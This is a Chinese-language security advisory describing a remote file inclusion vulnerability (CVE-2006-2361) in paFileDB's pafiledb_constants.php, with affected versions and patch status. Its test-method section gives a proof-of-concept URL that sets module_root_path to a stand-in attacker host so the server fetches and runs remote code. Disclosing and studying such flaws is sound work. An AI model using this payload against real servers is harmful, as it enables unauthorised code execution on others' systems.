首页 -> 安全研究

安全研究

安全漏洞
paFileDB pafiledb_constants.php远程文件包含漏洞

发布日期:2006-05-09
更新日期:2006-05-13

受影响系统:
paFileDB paFileDB 2.0.1
paFileDB paFileDB 1.1.3
描述:
BUGTRAQ  ID: 17930
CVE(CAN) ID: CVE-2006-2361

paFileDB是一款文件管理脚本,允许版主管理站点下载文件数据库,还可以编辑和删除文件。

paFileDB在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。

paFileDB的pafiledb_constants.php脚本没有正确验证 module_root_path=http:// 参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。

<**>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]

建议:
厂商补丁:

paFileDB
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phparena.net

浏览次数:2328
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障